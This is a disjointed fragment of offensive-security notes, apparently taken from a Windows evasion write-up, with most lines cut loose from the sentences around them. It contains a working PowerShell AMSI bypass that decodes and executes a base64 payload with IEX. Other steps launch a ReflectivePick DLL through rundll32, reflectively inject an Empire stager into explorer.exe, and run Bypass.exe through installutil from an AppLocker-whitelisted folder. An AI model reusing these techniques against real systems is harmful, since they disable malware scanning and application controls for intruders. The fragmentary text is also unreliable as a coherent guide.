wchar_t* argument = L"[Ref].Assembly.GetType('System.Management.Automation.sAmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);$encoded = \"BASE64STRING\";$decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encoded));$decoded | Out-File -FilePath C:\Windows\Tasks\out.txt;IEX $decoded"; //Output debug
ReflectivePick_x64.dll
rundll32.exe .\ReflectivePick_x64.dll,Void
but as you will soon discover, AMSI picks up the Empire stager during runtime.
c:\windows\tasks\out.txt
dll.txt
to the $dllData object. This will ensure the DLL is reflectively injected into the explorer.exe process during runtime.
Bypass.exe
with VS.installutil.exe
or similar LOLBins to execute Bypass.exe. If AppLocker is present, execute it from a whitelisted directory such as C:\Windows\Tasks